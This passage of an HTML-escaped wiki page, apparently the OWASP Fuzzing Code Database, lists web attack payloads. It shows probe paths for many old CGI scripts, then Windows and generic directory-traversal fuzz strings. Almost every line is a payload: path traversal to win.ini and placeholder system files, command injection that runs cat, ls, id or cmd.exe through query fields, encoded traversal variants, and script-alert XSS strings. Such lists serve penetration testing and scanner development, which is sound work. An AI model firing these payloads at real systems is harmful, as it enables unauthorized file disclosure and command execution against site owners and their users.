ftpsh&lt;br /&gt;
gH.cgi&lt;br /&gt;
gbadmin.cgi?action=change_adminpass&lt;br /&gt;
gbadmin.cgi?action=change_automail&lt;br /&gt;
gbadmin.cgi?action=colors&lt;br /&gt;
gbadmin.cgi?action=setup&lt;br /&gt;
gbook/gbook.cgi?_MAILTO=xx;ls&lt;br /&gt;
gbpass.pl&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../..{KNOWNFILE}%00board=board_1&lt;br /&gt;
getdoc.cgi&lt;br /&gt;
gettransbitmap&lt;br /&gt;
glimpse&lt;br /&gt;
gm-authors.cgi&lt;br /&gt;
gm-cplog.cgi&lt;br /&gt;
gm.cgi&lt;br /&gt;
guestbook.cgi&lt;br /&gt;
guestbook.cgi?user=cpanel&amp;amp;template=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
guestbook.pl&lt;br /&gt;
guestbook/passwd&lt;br /&gt;
handler.cgi&lt;br /&gt;
hitview.cgi&lt;br /&gt;
horde/test.php&lt;br /&gt;
horde/test.php?mode=phpinfo&lt;br /&gt;
hsx.cgi?show=../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
htgrep?file=index.html&amp;amp;hdr={KNOWNFILE}&lt;br /&gt;
html2chtml.cgi&lt;br /&gt;
html2wml.cgi&lt;br /&gt;
htmlscript?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'XSS'%29%3B%3C%2Fscript%3E&lt;br /&gt;
htsearch?-c/nonexistant&lt;br /&gt;
htsearch?config=foofighter&amp;amp;restrict=&amp;amp;exclude=&amp;amp;method=and&amp;amp;format=builtin-long&amp;amp;sort=score&amp;amp;words=&lt;br /&gt;
htsearch?exclude=%60{KNOWNFILE}%60&lt;br /&gt;
ibill.pm&lt;br /&gt;
icat&lt;br /&gt;
if/admin/nph-build.cgi&lt;br /&gt;
ikonboard/help.cgi?&lt;br /&gt;
imageFolio.cgi&lt;br /&gt;
imagefolio/admin/admin.cgi&lt;br /&gt;
imagemap&lt;br /&gt;
include/new-visitor.inc.php&lt;br /&gt;
index.js0x70&lt;br /&gt;
index.pl&lt;br /&gt;
info2www&lt;br /&gt;
info2www '(../../../../../../../bin/mail root &amp;lt;{KNOWNFILE}&amp;gt;&lt;br /&gt;
infosrch.cgi&lt;br /&gt;
ion-p?page=../../../../..{KNOWNFILE}&lt;br /&gt;
jailshell&lt;br /&gt;
jj&lt;br /&gt;
journal.cgi?folder=journal.cgi%00&lt;br /&gt;
ksh&lt;br /&gt;
lastlines.cgi?process&lt;br /&gt;
listrec.pl&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
log-reader.cgi&lt;br /&gt;
log/&lt;br /&gt;
log/nether-log.pl?checkit&lt;br /&gt;
login.cgi&lt;br /&gt;
login.pl&lt;br /&gt;
login.pl?course_id=\&lt;br /&gt;
logit.cgi&lt;br /&gt;
logs.pl&lt;br /&gt;
logs/&lt;br /&gt;
logs/access_log&lt;br /&gt;
logs/error_log&lt;br /&gt;
lookwho.cgi&lt;br /&gt;
ls&lt;br /&gt;
lwgate&lt;br /&gt;
lwgate.cgi&lt;br /&gt;
magiccard.cgi?pa=3Dpreview&amp;amp;amp;next=3Dcustom&amp;amp;amp;page=3D../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mail&lt;br /&gt;
mail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mail/nph-mr.cgi?do=loginhelp&amp;amp;configLanguage=../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mailit.pl&lt;br /&gt;
maillist.cgi&lt;br /&gt;
maillist.pl&lt;br /&gt;
mailnews.cgi&lt;br /&gt;
main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
majordomo.pl&lt;br /&gt;
man2html&lt;br /&gt;
mastergate/search.cgi?search=0&amp;amp;search_on=all&lt;br /&gt;
meta.pl&lt;br /&gt;
mgrqcgi&lt;br /&gt;
mini_logger.cgi&lt;br /&gt;
mmstdod.cgi&lt;br /&gt;
moin.cgi?test&lt;br /&gt;
mojo/mojo.cgi&lt;br /&gt;
mrtg.cfg?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=blah&lt;br /&gt;
ms_proxy_auth_query/&lt;br /&gt;
mt-static/&lt;br /&gt;
mt-static/mt-check.cgi&lt;br /&gt;
mt-static/mt-load.cgi&lt;br /&gt;
mt-static/mt.cfg&lt;br /&gt;
mt/&lt;br /&gt;
mt/mt-check.cgi&lt;br /&gt;
mt/mt-load.cgi&lt;br /&gt;
mt/mt.cfg&lt;br /&gt;
multihtml.pl?multi={KNOWNFILE}%00html&lt;br /&gt;
musicqueue.cgi&lt;br /&gt;
myguestbook.cgi?action=view&lt;br /&gt;
namazu.cgi&lt;br /&gt;
nbmember.cgi?cmd=list_all_users&lt;br /&gt;
netauth.cgi?cmd=show&amp;amp;page=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
netpad.cgi&lt;br /&gt;
newsdesk.cgi?t=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
nimages.php&lt;br /&gt;
nlog-smb.cgi&lt;br /&gt;
nlog-smb.pl&lt;br /&gt;
non-existent.pl&lt;br /&gt;
noshell&lt;br /&gt;
nph-emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
nph-error.pl&lt;br /&gt;
nph-exploitscanget.cgi&lt;br /&gt;
nph-maillist.pl&lt;br /&gt;
nph-publish&lt;br /&gt;
nph-publish.cgi&lt;br /&gt;
nph-showlogs.pl?files=../../&amp;amp;filter=.*&amp;amp;submit=Go&amp;amp;linecnt=500&amp;amp;refresh=0&lt;br /&gt;
nph-test-cgi&lt;br /&gt;
ntitar.pl&lt;br /&gt;
opendir.php?{KNOWNFILE}&lt;br /&gt;
orders/orders.txt&lt;br /&gt;
pagelog.cgi&lt;br /&gt;
pals-cgi?palsAction=restart&amp;amp;documentName={KNOWNFILE}&lt;br /&gt;
parse-file&lt;br /&gt;
pass&lt;br /&gt;
passwd&lt;br /&gt;
passwd.txt&lt;br /&gt;
password&lt;br /&gt;
pbcgi.cgi?name=Joe%Camel&amp;amp;email=%3C&lt;br /&gt;
perl&lt;br /&gt;
perl?-v&lt;br /&gt;
perlshop.cgi&lt;br /&gt;
pfdispaly.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
pfdispaly.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
pfdisplay.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
phf&lt;br /&gt;
phf.cgi?QALIA&lt;br /&gt;
phf?Qname=root%0Acat%20{KNOWNFILE}%20&lt;br /&gt;
photo/&lt;br /&gt;
photo/manage.cgi&lt;br /&gt;
photo/protected/manage.cgi&lt;br /&gt;
php-cgi&lt;br /&gt;
php.cgi?{KNOWNFILE}&lt;br /&gt;
plusmail&lt;br /&gt;
pollit/Poll_It_&lt;br /&gt;
pollssi.cgi&lt;br /&gt;
post-query&lt;br /&gt;
post_query&lt;br /&gt;
postcards.cgi&lt;br /&gt;
powerup/r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
printenv&lt;br /&gt;
printenv.tmp&lt;br /&gt;
probecontrol.cgi?command=enable&amp;amp;username=cancer&amp;amp;password=killer&lt;br /&gt;
processit.pl&lt;br /&gt;
profile.cgi&lt;br /&gt;
pu3.pl&lt;br /&gt;
publisher/search.cgi?dir=jobs&amp;amp;template=;cat%20{KNOWNFILE}|&amp;amp;output_number=10&lt;br /&gt;
query&lt;br /&gt;
query?mss=%2e%2e/config&lt;br /&gt;
quickstore.cgi?page=../../../../../../../../../..{KNOWNFILE}%00html&amp;amp;cart_id=&lt;br /&gt;
quikstore.cfg&lt;br /&gt;
quizme.cgi&lt;br /&gt;
r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ratlog.cgi&lt;br /&gt;
redirect&lt;br /&gt;
register.cgi&lt;br /&gt;
replicator/webpage.cgi/&lt;br /&gt;
responder.cgi&lt;br /&gt;
retrieve_password.pl&lt;br /&gt;
rksh&lt;br /&gt;
rmp_query&lt;br /&gt;
robadmin.cgi&lt;br /&gt;
robpoll.cgi&lt;br /&gt;
rpm_query&lt;br /&gt;
rsh&lt;br /&gt;
rtm.log&lt;br /&gt;
rwcgi60&lt;br /&gt;
rwcgi60/showenv&lt;br /&gt;
rwwwshell.pl&lt;br /&gt;
sawmill5?rfcf+%22{KNOWNFILE}%22+spbn+1,1,21,1,1,1,1&lt;br /&gt;
sawmill?rfcf+%22&lt;br /&gt;
sbcgi/sitebuilder.cgi&lt;br /&gt;
scoadminreg.cgi&lt;br /&gt;
scripts/*%0a.pl&lt;br /&gt;
search.cgi&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
search.php?searchstring=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl&lt;br /&gt;
search.pl?Realm=All&amp;amp;Match=0&amp;amp;Terms=test&amp;amp;nocpp=1&amp;amp;maxhits=10&amp;amp;;Rank=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl?form=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
search/search.cgi?keys=*&amp;amp;prc=any&amp;amp;catigory=../../../../../../../../../../../../etc&lt;br /&gt;
sendform.cgi&lt;br /&gt;
sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message&lt;br /&gt;
sendtemp.pl?templ=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
session/adminlogin&lt;br /&gt;
sewse?/home/httpd/html/sewse/jabber/comment2.jse+{KNOWNFILE}&lt;br /&gt;
sh&lt;br /&gt;
shop.cgi?page=../../../../../../..{KNOWNFILE}&lt;br /&gt;
shop.pl/page=;cat%20shop.pl|&lt;br /&gt;
shop/auth_data/auth_user_file.txt&lt;br /&gt;
shop/orders/orders.txt&lt;br /&gt;
shopper.cgi?newpage=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
shopplus.cgi?dn=domainname.com&amp;amp;cartid=%CARTID%&amp;amp;file=;cat%20{KNOWNFILE}|&lt;br /&gt;
show.pl&lt;br /&gt;
showcheckins.cgi?person=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
showuser.cgi&lt;br /&gt;
simple/view_page?mv_arg=|cat%20{KNOWNFILE}|&lt;br /&gt;
simplestguest.cgi&lt;br /&gt;
simplestmail.cgi&lt;br /&gt;
smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
smartsearch/smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
sojourn.cgi?cat=../../../../../../../../../../etc/password%00&lt;br /&gt;
spin_client.cgi?aaaaaaaa&lt;br /&gt;
ss&lt;br /&gt;
sscd_suncourier.pl&lt;br /&gt;
ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e{KNOWNFILE}&lt;br /&gt;
start.cgi/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
stat.pl&lt;br /&gt;
stat/&lt;br /&gt;
stats-bin-p/reports/index.html&lt;br /&gt;
stats.pl&lt;br /&gt;
stats.prf&lt;br /&gt;
stats/&lt;br /&gt;
stats/statsbrowse.asp?filepath=c:\&amp;amp;Opt=3&lt;br /&gt;
stats_old/&lt;br /&gt;
statsconfig&lt;br /&gt;
statusconfig.pl&lt;br /&gt;
statview.pl&lt;br /&gt;
store.cgi?&lt;br /&gt;
store/agora.cgi?cart_id=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
store/agora.cgi?page=whatever33.html&lt;br /&gt;
store/index.cgi?page=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
story/story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
survey&lt;br /&gt;
survey.cgi&lt;br /&gt;
sws/admin.html&lt;br /&gt;
sws/manager.pl&lt;br /&gt;
tablebuild.pl&lt;br /&gt;
talkback.cgi?article=../../../../../../../..{KNOWNFILE}%00&amp;amp;action=view&amp;amp;matchview=1&lt;br /&gt;
tcsh&lt;br /&gt;
technote/main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=/../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
test-cgi.tcl&lt;br /&gt;
test-cgi?/*&lt;br /&gt;
test-env&lt;br /&gt;
test.cgi&lt;br /&gt;
test/test.cgi&lt;br /&gt;
texis/junk&lt;br /&gt;
texis/phine&lt;br /&gt;
textcounter.pl&lt;br /&gt;
tidfinder.cgi&lt;br /&gt;
tigvote.cgi&lt;br /&gt;
title.cgi&lt;br /&gt;
tpgnrock&lt;br /&gt;
traffic.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
troops.cgi&lt;br /&gt;
ttawebtop.cgi/?action=start&amp;amp;pg=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ultraboard.cgi&lt;br /&gt;
ultraboard.pl&lt;br /&gt;
unlg1.1&lt;br /&gt;
unlg1.2&lt;br /&gt;
update.dpgs&lt;br /&gt;
upload.cgi&lt;br /&gt;
uptime&lt;br /&gt;
urlcount.cgi?%3CIMG%20&lt;br /&gt;
ustorekeeper.pl?command=goto&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
utm/admin&lt;br /&gt;
utm/utm_stat&lt;br /&gt;
view-source&lt;br /&gt;
view-source?view-source&lt;br /&gt;
view_item?HTML_FILE=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
viewcvs.cgi/viewcvs/?cvsroot=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\&lt;br /&gt;
viewlogs.pl&lt;br /&gt;
viewsource?{KNOWNFILE}&lt;br /&gt;
viralator.cgi&lt;br /&gt;
virgil.cgi&lt;br /&gt;
vote.cgi&lt;br /&gt;
vpasswd.cgi&lt;br /&gt;
vq/demos/respond.pl?&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
w3-msql&lt;br /&gt;
w3-sql&lt;br /&gt;
wais.pl&lt;br /&gt;
way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
way-board/way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
webais&lt;br /&gt;
webbbs.cgi&lt;br /&gt;
webbbs/webbbs_config.pl?name=joe&amp;amp;email=test@example.com&amp;amp;body=aaaaffff&amp;amp;followup=10;cat%20{KNOWNFILE}&lt;br /&gt;
webcart/webcart.cgi?CONFIG=mountain&amp;amp;CHANGE=YE&lt;br /&gt;
webdist.cgi?distloc=;cat%20{KNOWNFILE}&lt;br /&gt;
webdriver&lt;br /&gt;
webgais&lt;br /&gt;
webif.cgi&lt;br /&gt;
webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
webmap.cgi&lt;br /&gt;
webnews.pl&lt;br /&gt;
webplus?about&lt;br /&gt;
webplus?script=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
websendmail&lt;br /&gt;
webspirs.cgi?sp.nextform=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
webutil.pl&lt;br /&gt;
webutils.pl&lt;br /&gt;
webwho.pl&lt;br /&gt;
where.pl?sd=ls%20/etc&lt;br /&gt;
whois.cgi?action=load&amp;amp;whois=%3Bid&lt;br /&gt;
whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois/whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois_raw.cgi?fqdn=%0Acat%20{KNOWNFILE}&lt;br /&gt;
windmail&lt;br /&gt;
wrap&lt;br /&gt;
wrap.cgi&lt;br /&gt;
ws_ftp.ini&lt;br /&gt;
www-sql&lt;br /&gt;
wwwadmin.pl&lt;br /&gt;
wwwboard.cgi.cgi&lt;br /&gt;
wwwboard.pl&lt;br /&gt;
wwwstats.pl&lt;br /&gt;
wwwthreads/3tvars.pm&lt;br /&gt;
wwwthreads/w3tvars.pm&lt;br /&gt;
wwwwais&lt;br /&gt;
zml.cgi?file=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
zsh&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Windows Directory Traversal   (Update: 17 March 2010  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Windows Directory Traversal   (Update: 17 March 2010&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
../../../../../../../../../../../../localstart.asp%00&lt;br /&gt;
../../../../../../../../../../../../localstart.asp&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Generic 8 Directory Deep Traversal Fuzz (17 March 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Generic 8 Directory Deep Traversal Fuzz (17 March 2010) &lt;br /&gt;
# Derived from the awesome &amp;quot;Directory Traversal Fuzzing Code&amp;quot; v0.2 by Luca Carettoni&lt;br /&gt;
# Did some cleanup &amp;amp; removed anything to the right of {FILE} for inclusion in a&lt;br /&gt;
# separate fuzzfile for more flexibiity, for the OWASP Fuzzing Code Database. &lt;br /&gt;
# adam.muntner@uietmove.com &lt;br /&gt;
&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
